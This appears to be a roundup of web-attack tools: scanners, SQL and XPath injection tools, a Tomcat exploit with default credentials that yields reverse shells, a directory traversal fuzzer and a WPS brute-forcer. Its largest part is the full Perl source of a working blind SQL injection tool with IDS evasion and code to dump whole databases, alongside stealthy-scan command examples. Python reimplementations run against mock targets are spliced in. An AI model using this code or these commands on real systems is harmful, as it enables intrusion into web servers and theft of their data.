IronWASP – Iron Web application Advanced Security testing Platform
IronWASP (Iron Web application Advanced Security testing Platform) is an open source system for web application vulnerability testing. It is designed to be customizable to the extent where users can create their own custom security scanners using it. Though an advanced user with Python/Ruby scripting expertise would be able to make full use of the platform, a lot of the tool’s features are simple enough to be used by absolute beginners.
Learn more about it here | Download from here
Passive Plug-ins
- Analyzes all traffic going through the tool
- Can also modify the traffic
- Identifies vulnerabilities passively
Eg: Passwords sent over clear-text HTTP, HttpOnly/Secure flag missing on cookies
Active Plug-ins
- Perform scans against the target to identify vulnerabilities
- Executed only when the user explicitly calls them
- Fine-grained scanning support
Eg: Cross-site Scripting, SQL Injection
IronWASP performs taint analysis for DOM-based XSS: it identifies sources and sinks and traces the flow between them through the JavaScript. Custom source and sink objects can also be configured.
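A passive check of the kind IronWASP's passive plug-ins perform, as an added illustration (this is not IronWASP code and does not use its plug-in API): it parses one captured request/response pair and flags the two findings named above, a credential sent over clear-text HTTP and a cookie set without HttpOnly or Secure. The sample messages, the credential field-name regex and the function names are constructed for this example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Field names treated as credentials (constructed heuristic, not IronWASP's).
PASSWORD_FIELD = re.compile(r"^(pass(word|wd)?|pwd|secret)$", re.I)


def parse_message(raw):
    """Split a raw HTTP message into (start line, [(name, value)], body)."""
    head, _, body = raw.partition("\r\n\r\n")
    start, *header_lines = head.split("\r\n")
    headers = []
    for line in header_lines:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return start, headers, body


def check_request(raw, scheme):
    """Flag credential fields carried by a request that was not sent over TLS."""
    start, _, body = parse_message(raw)
    method, target, _ = start.split(" ", 2)
    fields = parse_qs(body) if method == "POST" else parse_qs(urlsplit(target).query)
    findings = []
    if scheme != "https":
        for name in fields:
            if PASSWORD_FIELD.match(name):
                findings.append(f"credential field '{name}' sent over clear-text {scheme}")
    return findings


def check_response(raw, scheme):
    """Flag Set-Cookie headers lacking HttpOnly, or lacking Secure on an HTTPS response."""
    _, headers, _ = parse_message(raw)
    findings = []
    for name, value in headers:
        if name != "set-cookie":
            continue
        cookie = value.split(";", 1)[0].split("=", 1)[0].strip()
        attrs = {a.strip().split("=", 1)[0].lower() for a in value.split(";")[1:]}
        if "httponly" not in attrs:
            findings.append(f"cookie '{cookie}' set without HttpOnly")
        if scheme == "https" and "secure" not in attrs:
            findings.append(f"cookie '{cookie}' set without Secure")
        elif scheme != "https":
            # Secure cannot protect a cookie the server itself sends in clear text.
            findings.append(f"cookie '{cookie}' issued over clear-text {scheme}")
    return findings


# Constructed sample traffic, as a passive plug-in would see it on the wire.
SAMPLE_REQUEST = (
    "POST /login HTTP/1.1\r\nHost: app.example\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "user=alice&password=hunter2"
)
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Set-Cookie: session=abc123; Path=/\r\n"
    "Set-Cookie: theme=dark; Path=/; HttpOnly; Secure\r\n\r\n<html></html>"
)


def analyse(request, response, scheme):
    """Run both passive checks over one request/response pair; returns the findings list."""
    return check_request(request, scheme) + check_response(response, scheme)


if __name__ == "__main__":
    for finding in analyse(SAMPLE_REQUEST, SAMPLE_RESPONSE, "http"):
        print(finding)
```

The scheme has to come from the proxy (which knows whether the connection was TLS), not from the message itself; that is why it is a parameter rather than something parsed out of the headers.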
web-sorrow – server security scanner
A Perl-based tool for misconfiguration, version detection, enumeration, and server information scanning. Web-Sorrow is a "safe to run" program, meaning it is not designed to attempt exploitation or to perform any kind of injection, DDoS/DoS, CSRF, XSS, or other harmful attack. It's entirely focused on enumeration and collecting info on the target server.
CURRENT functionality:
-S - stands for standard. A set of standard tests that includes: directory indexing testing, banner grabbing, language detection (should be obvious), robots.txt, 200 response testing (some servers send a 200 OK for every request, which would otherwise make every probe look like a hit), and thumbs.db scanning
-auth - looks for login pages using a list of some of the most common login files, dirs and admin consoles. The list doesn't need to be very big, because what else are you going to name it? notAlogin.php???
-Cp - scan with a huge list of plugin dirs. The list is a bit old (the Drupal and WordPress plugin databases are now current, but sorry, Joomla's is still a bit old)
-I - searches the responses for interesting strings
-Ws - looks for web services such as hosting provider, blogging services, favicon fingerprinting, and CMS version info
-Fd - looks for things people generally don't want you to see. The list is generated from a TON of robots.txt files, so whatever it finds should be interesting.
-ninja - a lightweight scan, intended to be hard to detect, that uses bits and pieces from the other scans
-R - use HTTP Range headers to make scans faster
-Shadow - use Google's cache instead of requesting from the target host
-Sd - brute-force subdomains
-Db - brute-force directories with the big DirBuster database
-ua - use a custom User-Agent. PUT THE UA IN QUOTES if it contains spaces
-proxy - send all HTTP requests via a proxy. Example: 255.255.255.254:8080
-e - run all the scans in the tool
web-sorrow also has false-positive checking on most of its requests (it's pretty accurate, but not perfect).
EXAMPLES:
- basic: perl Wsorrow.pl -host scanme.nmap.org -S
- stealthy: perl Wsorrow.pl -host scanme.nmap.org -ninja -proxy 190.145.74.10:3128
- scan for login pages: perl Wsorrow.pl -host 192.168.1.1 -auth
- CMS intense scan: perl Wsorrow.pl -host 192.168.1.1 -Ws -Cp all -I
- most intense scan possible: perl Wsorrow.pl -host 192.168.1.1 -e
- dump http headers: perl headerDump.pl
- Check if host is alive: perl hdt.pl -host 192.168.1.1
CONTACT: @flyinpoptartcat
Enema – tool for SQL injection
Enema is not auto-hacking software. It is a dynamic tool for people who know what they are doing.
Old database versions (e.g. MySQL 4.x) are not supported; development targets modern versions.
Features:
- Multi-platform.
- User-friendly graphical interface.
- Multithreaded.
- Dump.
- Customise your queries.
- Plugins to automate attacks.
Supported for today:
- POST, GET, Cookies
- MSSQL >= 2000 and MySQL >= 5.0
Injection methods supported for today:
- Error-based injection.
- Union-based injection (using a subquery).
- Blind time-based injection: MSSQL (waitfor), MySQL (sleep)
Download here
XCat – exploitation of XPath injection vulnerabilities
XCat is a command line program that aids in the exploitation of XPath injection vulnerabilities. It boasts a wide range of features and can use the more advanced features of the XPath 2.0 specification (pattern matching, Unicode normalization and even HTTP requests), or gracefully degrade to XPath 1.0 if they are not available.
XCat is built to exploit boolean XPath injections (where only one bit of data can be extracted per request), and it requires you to identify the injection point manually first; it does not do that for you.
Features
- Supports injection via both GET and POST parameters
- Extracts all nodes, comments, attributes and data from the entire XML document
- Small and lightweight (only dependency is Twisted)
- Parallel requests
- XPath 2.0 supported (with graceful degrading to 1.0)
- Regex pattern matching to reduce character search space
- Unicode normalization
- Advanced data postback through HTTP (see below)
- Arbitrarily read XML files on the servers file system via the doc() function (see below)
Source here
usage: xcat.py [-h] [--method {GET,POST}] [--arg POST_ARGUMENT]
               [--true TRUE_KEYWORD | --false FALSE_KEYWORD | --error ERROR_KEYWORD]
               [--true-code TRUE_CODE | --false-code FAIL_CODE | --error-code ERROR_CODE]
               [--schema-only] [--quotecharacter QUOTE_CHARACTER]
               [--executequery EXECUTEQUERY] [--max_search SEARCH_LIMIT]
               [--timeout TIMEOUT] [--stepsize STEP_SIZE]
               [--normalize {NFD,NFC,NFDK,NFKC}] [--xversion {1,2,auto}]
               [--lowercase] [--regex] [--connectback]
               [--connectbackip CONNECTBACK_IP] [--connectbackport CONNECTBACK_PORT]
               [--notfoundstring NOTFOUNDCHAR] [--fileshell] [--getcwd]
               [--useragent USER_AGENT] [--timeit]
               URL
Apache Tomcat Remote Exploit (PUT request) and Account Scanner
The modified pnscan scanner utility scans a range of IPs to find exposed Apache Tomcat servers by trying the following login combinations:
- tomcat:tomcat
- password:password
- admin:admin
- admin:password
- admin:<nopass>
- tomcat:<nopass>
The included Perl script uses the collected login combinations to exploit Apache Tomcat servers remotely.
It will return a root or SYSTEM reverse shell depending on the operating system, or otherwise a reverse shell as the user Tomcat is running as. The exploit may contain Metasploit logic (thanks to jduck).
By Kingcope
Use this tool at your own risk. No source code review has been done (it may contain a hidden shell).
httpry packet sniffer
httpry is a packet sniffer designed for displaying and logging HTTP traffic. It is not intended to perform analysis itself, but to capture, parse, and log the traffic for later analysis. It can be run in real time, displaying the traffic as it is parsed, or as a daemon process that logs to an output file. It is written to be as lightweight and flexible as possible, so that it can be easily adapted to different applications.
What can you do with it? Here's a few ideas:
- See what users on your network are requesting online
- Check for proper server configuration (or improper, as the case may be)
- Research patterns in HTTP usage
- Watch for dangerous downloaded files
- Verify the enforcement of HTTP policy on your network
- Extract HTTP statistics out of saved capture files
This release brings substantial improvements to some existing features. IPv6 parsing can now follow extension headers that are present in the captured packets. Also, the rate statistics code has been substantially overhauled to handle an arbitrary number of hosts, along with a couple of additional switches for controlling behavior. Additionally, this release adds an optional switch to specify the PID filename, which is helpful when running multiple instances of httpry on the same box.
DotDotPwn v3.0 The Directory Traversal Fuzzer
Version: DotDotPwn v3.0
Release date: 03/Feb/2012 (Release at BugCon Security Conferences 2012)
Changes / Enhancements / Features:
- -X switch that implements the bisection algorithm (http://en.wikipedia.org/wiki/Bisection_method) to detect the exact depth once a directory traversal vulnerability has been found
- -M switch to specify a method other than the default (GET) when the http module is used. Other HTTP methods are: POST | HEAD | COPY | MOVE
- -e switch to specify the file extension to be appended at the end of each fuzz string (e.g. ".php", ".jpg", ".inc")
- New dots & slashes encodings (fuzz patterns) based on: https://www.owasp.org/index.php/Canonicalization,_locale_and_Unicode and http://wikisecure.net/security/uri-encoding-to-bypass-idsips
Supported modules:
- HTTP
- HTTP URL
- FTP
- TFTP
- Payload (Protocol independent)
- STDOUT
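The -X bisection works because a traversal that escapes the document root at depth d also escapes it at any greater depth (an extra ".." at "/" is a no-op), so "does depth d work?" is a monotone predicate and the smallest working depth can be found in O(log n) requests instead of one request per depth. As an added example, not DotDotPwn's code, the block below fuzzes a small set of dot/slash encodings against a constructed target that strips "../" once, then bisects the depth with the pattern that got through; the `ext` argument mimics the -e switch. The target, the pattern list and the function names are assumptions of the example.

```python
import posixpath
from urllib.parse import unquote

# A few dot/slash encodings in the spirit of DotDotPwn's fuzz patterns (constructed subset).
TRAVERSAL_PATTERNS = ["../", "..\\", "%2e%2e/", "..%2f", "%2e%2e%2f", "....//"]


class FakeTarget:
    """Constructed web server: files live under `docroot`, and a naive filter
    strips '../' exactly once before the path is resolved."""

    def __init__(self, docroot="/var/www/html/app", secret="/etc/passwd"):
        self.docroot, self.secret = docroot, secret

    def fetch(self, rel):
        path = unquote(rel).replace("\\", "/")   # decode %xx and normalise backslashes
        path = path.replace("../", "")           # the one-pass filter that '....//' survives
        full = posixpath.normpath(posixpath.join(self.docroot, path))
        return "root:x:0:0:root:/root:/bin/sh\n" if full == self.secret else "404 Not Found"


def hits(fetch, pattern, depth, target="etc/passwd", ext="", marker="root:"):
    """True if `pattern` repeated `depth` times reaches the target file."""
    return marker in fetch(pattern * depth + target + ext)


def find_pattern(fetch, max_depth=8, **kw):
    """Fuzz step: try each encoding at a generous depth, return the first that works."""
    for pattern in TRAVERSAL_PATTERNS:
        if hits(fetch, pattern, max_depth, **kw):
            return pattern
    return None


def bisect_depth(fetch, pattern, max_depth=8, **kw):
    """-X step: smallest depth at which `pattern` works, by bisection over [1, max_depth].
    Returns None when even max_depth does not work (docroot deeper than the cap)."""
    if not hits(fetch, pattern, max_depth, **kw):
        return None
    lo, hi = 1, max_depth
    while lo < hi:
        mid = (lo + hi) // 2
        if hits(fetch, pattern, mid, **kw):
            hi = mid          # works here, so the answer is at mid or shallower
        else:
            lo = mid + 1      # does not work, so the docroot is deeper than mid
    return lo


if __name__ == "__main__":
    target = FakeTarget()
    pattern = find_pattern(target.fetch)
    print("working pattern:", pattern, "depth:", bisect_depth(target.fetch, pattern))
```

The cap matters: if the document root is deeper than `max_depth`, the bisection has nothing to bisect, so the code checks the deepest probe first and reports failure rather than returning a bogus depth.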
Feel free to download this new release from the following sites:
Contact us: dotdotpwn@sectester.net
Reaver – brute force Wifi Protected Setup
Reaver implements a brute force attack against Wifi Protected Setup (WPS) registrar PINs in order to recover WPA/WPA2 passphrases, as described in http://sviehb.files.wordpress.com/2011/12/viehboeck_wps.pdf.
Reaver has been designed to be a robust and practical attack against WPS, and has been tested against a wide variety of access points and WPS implementations.
On average Reaver will recover the target AP's plain text WPA/WPA2 passphrase in 4-10 hours, depending on the AP. In practice, it will generally take half this time to guess the correct WPS pin and recover the passphrase.
MySql 5 Enumeration tool
This script uses blind SQL injection and boolean enumeration to perform INFORMATION_SCHEMA Mapping.
Usage:
perl mysql5enum.pl -h [hostname] -u [url] [-q [query]]
Ex:
perl mysql5enum.pl -h www.target.tld -u http://www.target.tld/vuln.ext?input=24 -q "select system_user()"
* By default, this script will first determine the username, version and database name before enumerating the INFORMATION_SCHEMA information.
* When the -q flag is applied, the user can supply any query that returns a single cell.
* If the exploit or vulnerability requires a single quote, simply tack %27 onto the end of the URI.
* This script contains error detection: it only works on a MySQL 5.x database, and knows when its queries have syntax errors.
* This script uses Perl's LibWhisker2 for IDS evasion (the same as Nikto).
* This script uses MD5 as an optimization: it hashes a known-true and a known-false page once and compares every later response hash against those, rather than diffing whole pages. There are other optimization methods, and this may not work on all sites.
#!/usr/bin/perl
use strict;
use warnings;
use Getopt::Std;
use Digest::MD5 qw(md5_hex);
use LW2;

my %options = ();
getopts("u:h:q:", \%options);
my $url  = $options{u}; # Vulnerable URL; the injection is appended to the end
my $host = $options{h}; # Needed by libwhisker for the Host header
die "Usage: $0 -h [hostname] -u [url] [-q [query]]\n" unless defined $url && defined $host;

my $count = 0; # total requests sent so far

# A user-supplied query (-q) must return exactly one cell.
if (my $q = $options{q}) {
    $q =~ s/ /%20/g;
    my ($cxr, $result) = runQuery($url, $host, $q);
    print "Query Result:\n\t$result\nCalculated in $cxr requests.\n";
    exit(0);
}

# Get the database version
my $query = "SELECT%20VERSION()";
my ($tmp, $version) = runQuery($url, $host, $query);
$count += $tmp;
$count += 2; # the two true/false baseline requests (sent by every runQuery, counted once here)
print "\nDatabase Version:\t\t$version\nIn $count requests.\n\n";

# Get the database name
$query = "SELECT%20DATABASE()";
my $answer;
($tmp, $answer) = runQuery($url, $host, $query);
print "Database Name:\t\t$answer\nIn $tmp requests.\n\n";

# Get the database user
$query = "SELECT%20USER()";
($tmp, $answer) = runQuery($url, $host, $query);
print "Database User:\t\t$answer\nIn $tmp requests.\n\n";

# INFORMATION_SCHEMA only exists from MySQL 5.0 onwards
if ($version =~ /^5\./) {
    print "Enumerating Database Spec:\n";
    getSchema($url, $host);
    exit(0);
} else {
    print "This is not MySQL v5.x, so I can't enumerate the schema tables!\n";
    exit(1);
}
sub getSchema
{
my $url = shift;
my $host = shift;
my $query = "SELECT COUNT(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=(SELECT DATABASE())";
$query =~ s/ /%20/g;
my ($c, $val) = runQuery($url,$host,$query);
# $val = number of table names in the current database.
for (my $i=0; $i < int($val); ++$i)
{
$query = "SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=(SELECT DATABASE()) LIMIT $i,1";
$query =~ s/ /%20/g;
my ($q, $table) = runQuery($url,$host,$query);
print "$table:\n";
# $table = table name
$query = "SELECT COUNT(COLUMN_NAME) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=";
$query .= "(SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=";
$query .= "(SELECT DATABASE()) LIMIT $i,1)";
$query =~ s/ /%20/g;
my ($r, $fcount) = runQuery($url,$host,$query);
# $fcount - number of columns in the table
for (my $n = 0; $n < int($fcount); ++$n)
{
$query = "SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=";
$query .= "(SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=";
$query .= "(SELECT DATABASE()) LIMIT $i,1) LIMIT $n,1";
$query =~ s/ /%20/g;
my ($o, $field) = runQuery($url,$host,$query);
print "\t$field\n";
# Uncomment the lines below to
# scrape the entire database.
# $query = "SELECT COUNT($field) FROM $table";
# $query =~ s/ /%20/g;
# my ($r, $total) = runQuery($url,$host,$query);
# for (my $cn = 0; $cn < $total; $cn++)
# {
# $query = "SELECT $field FROM $table LIMIT $cn,1";
# $query =~ s/ /%20/g;
# my ($e, $data) = runQuery($url,$host,$query);
# print "\t\t$data\n";
# }
}
}
}
# Extract the single-cell result of $query one character at a time.
sub runQuery
{
    my ($url, $host, $query) = @_;
    my $qCount  = 0;
    my $floor   = 0;    # bottom of the ASCII search range
    my $ceiling = 255;  # top of the ASCII search range
    my $spacer  = "%20OR%20";
    my $truth   = "62=62/*";
    my $lie     = "88=98/*";
    # Fingerprint a known-true and a known-false page once; every later probe
    # is compared against these two hashes.
    my ($true, $false) = makeTrueFalse($url, $spacer, $truth, $lie, $host);
    # First find the length of the result (search range capped at 64 characters)...
    my $lenUri = $url . queryConstruct(0, 0, $spacer, $query);
    my ($qCH, $len) = getValue($lenUri, 64, 0, $true, $false, $host);
    $qCount += $qCH;
    # ...then binary-search each character's ASCII value in turn.
    my $results = "";
    for (my $pos = 1; $pos <= $len; ++$pos) {
        my $uri = $url . queryConstruct(1, $pos, $spacer, $query);
        my ($n, $value) = getValue($uri, $ceiling, $floor, $true, $false, $host);
        $qCount += $n;
        $results .= chr($value);
    }
    return ($qCount, $results);
}
# Binary search for the integer value of the injected expression. Each probe
# asks the server whether the expression is greater than, less than or equal
# to the midpoint and compares the page hash with the known-true hash. The
# search range is [$floor, $ceiling] inclusive, so it always terminates.
sub getValue
{
    my ($uri, $ceiling, $floor, $true, $false, $host) = @_;
    my $qCount = 0;
    while ($floor <= $ceiling) {
        my $maybe = int(($floor + $ceiling) / 2);
        ++$qCount;
        if (isGT($uri, $maybe, $host) eq $true) {
            $floor = $maybe + 1;
            next;
        }
        ++$qCount;
        if (isLT($uri, $maybe, $host) eq $true) {
            $ceiling = $maybe - 1;
            next;
        }
        ++$qCount;
        if (isEQ($uri, $maybe, $host) eq $true) {
            return ($qCount, $maybe);
        }
        # Neither >, < nor = matched the true page: the injected SQL most
        # likely produced a syntax error on the server.
        print "SQL Error caught! Aborting!\n";
        print "At least 3 queries in error log!\n";
        exit(1);
    }
    print "Value not found in the search range. Aborting!\n";
    exit(1);
}
# Is greater than?
sub isGT
{
my $uri = shift;
my $guess = shift;
my $host = shift;
return (md5_hex(download("$uri>$guess)/*", $host)));
}
# Is less than?
sub isLT
{
my $uri = shift;
my $guess = shift;
my $host = shift;
return (md5_hex(download("$uri<$guess)/*", $host)));
}
# Is equal to?
sub isEQ
{
my $uri = shift;
my $guess = shift;
my $host = shift;
return (md5_hex(download("$uri=$guess)/*", $host)));
}
# Fetch a URI through libwhisker and return the response body; retries up to
# five times on a transport error. Taken from an older version of the scanner.
sub download
{
    my ($uri, $host, $try) = @_;
    $try ||= 1;
    my (%request, %response);
    LW2::http_init_request(\%request);
    $request{'whisker'}->{'method'} = "GET";
    $request{'whisker'}->{'host'} = $host;
    $request{'whisker'}->{'uri'} = $uri;
    $request{'whisker'}->{'encode_anti_ids'} = 962; # libwhisker anti-IDS encoding mode(s), as used by Nikto's -evasion
    $request{'whisker'}->{'user-agent'} = "wget";
    LW2::http_fixup_request(\%request);
    if (LW2::http_do_request(\%request, \%response)) {
        if ($try < 5) {
            print "Failed to fetch $uri on try $try. Retrying...\n";
            return download($uri, $host, $try + 1);
        }
        die "Failed to fetch $uri after $try tries.\n";
    }
    return $response{'whisker'}->{'data'};
}
# Build the injected clause appended to the URL. Type 0 wraps the query in
# LENGTH() to find the result length; type 1 extracts the ASCII value of the
# character at $pos (lower-cased, so results come back in lower case). The
# comparison operator and the closing parenthesis are added by isGT/isLT/isEQ.
sub queryConstruct
{
    my ($type, $pos, $spacer, $query) = @_;
    if ($type == 0) { # length of the result
        return $spacer . "(LENGTH(($query))";
    } elsif ($type == 1) { # character at $pos
        return $spacer . "((ASCII((LOWER((MID((" . $query . "),$pos,1))))))";
    }
}
sub makeTrueFalse
{
my $url = shift;
my $spacer = shift;
my $truth = shift;
my $lie = shift;
my $host = shift;
my $trueMD = md5_hex(download("$url$spacer$truth", $host));
my $falsMD = md5_hex(download("$url$spacer$lie", $host));
# returns true, false
return ($trueMD, $falsMD);
}
Source here
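The extraction loop in the script above (find the length, then binary-search each character's ASCII value, deciding true or false from the MD5 of the page) is the general boolean-blind technique; it is also what XCat does against XPath, one bit per request. As an added example, not the script's own code nor XCat's, the block below reimplements it in Python against a constructed SQLite-backed page so that it runs offline. The SQLite functions UNICODE/SUBSTR stand in for MySQL's ASCII/MID (the MySQL templates are listed alongside them), the class and function names are mine, and it departs from the script in two ways: it probes only with ">" (a lower-bound search), so each halving costs one request instead of up to three, and it confirms the final value with one "=" request, so a value outside the search range is reported instead of being silently clipped.

```python
import hashlib
import sqlite3

# Payload templates. "mysql" is the form mysql5enum.pl sends; "sqlite" is the
# equivalent used here so the demo runs offline. The dialect table is an
# assumption of this example, not part of the script.
DIALECTS = {
    "mysql": {"len": "LENGTH(({q}))",
              "chr": "ASCII(LOWER(MID(({q}),{pos},1)))"},
    "sqlite": {"len": "LENGTH(({q}))",
               "chr": "UNICODE(LOWER(SUBSTR(({q}),{pos},1)))"},
}

SQLITE_VERSION = sqlite3.sqlite_version  # exposed so the result can be checked


class VulnerableApp:
    """Constructed stand-in for the injectable page (sqlite3 instead of MySQL).
    The id parameter is concatenated straight into the WHERE clause, and the
    page body depends on how many rows come back, which is all a boolean
    oracle needs."""

    def __init__(self):
        self.db = sqlite3.connect(":memory:")
        self.db.execute("CREATE TABLE items (id INTEGER, label TEXT)")
        self.db.executemany("INSERT INTO items VALUES (?, ?)",
                            [(24, "widget"), (25, "Gadget")])

    def render(self, user_input):
        sql = f"SELECT label FROM items WHERE id={user_input} ORDER BY id"
        try:
            rows = self.db.execute(sql).fetchall()
        except sqlite3.Error:
            return "<h1>Database error</h1>"
        return "<ul>" + "".join(f"<li>{r[0]}</li>" for r in rows) + "</ul>"


class BlindExtractor:
    """Boolean blind extraction: one comparison per request, binary search per character."""

    def __init__(self, fetch, base, dialect="sqlite"):
        self.fetch, self.base, self.tpl = fetch, base, DIALECTS[dialect]
        self.requests = 0
        # Baseline fingerprints: MD5 of a known-true and a known-false page.
        self.true_fp = self._probe("62=62")
        self.false_fp = self._probe("88=98")
        if self.true_fp == self.false_fp:
            raise RuntimeError("true and false pages are identical: no boolean oracle here")

    def _probe(self, cond):
        self.requests += 1
        body = self.fetch(f"{self.base} OR ({cond})/*")   # '/*' comments out the rest of the query
        return hashlib.md5(body.encode()).hexdigest()

    def _search(self, expr, lo, hi):
        """Smallest v in [lo, hi] for which expr > v is false, i.e. the value of expr."""
        while lo < hi:
            mid = (lo + hi) // 2
            fp = self._probe(f"{expr}>{mid}")
            if fp == self.true_fp:
                lo = mid + 1
            elif fp == self.false_fp:
                hi = mid
            else:
                raise RuntimeError("response matches neither baseline; the injected SQL probably errored")
        if self._probe(f"{expr}={lo}") != self.true_fp:
            raise RuntimeError(f"value of {expr} lies outside the search range")
        return lo

    def run(self, query, max_len=64):
        length = self._search(self.tpl["len"].format(q=query), 0, max_len)
        return "".join(chr(self._search(self.tpl["chr"].format(q=query, pos=p), 0, 255))
                       for p in range(1, length + 1))


def extract(query, max_len=64):
    """Run the extractor against the constructed app; returns (value, request count)."""
    app = VulnerableApp()
    ex = BlindExtractor(app.render, base="24")
    return ex.run(query, max_len), ex.requests


if __name__ == "__main__":
    value, n = extract("SELECT label FROM items WHERE id=25")
    print(f"{value!r} in {n} requests")
```

As in the Perl script, LOWER() in the character template means extracted text comes back lower-cased, and a query that raises a database error is caught on the first probe because its page hash matches neither baseline. The base value (here the id 24) must be one for which the true and false pages actually differ; the constructor checks this before sending any probes.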
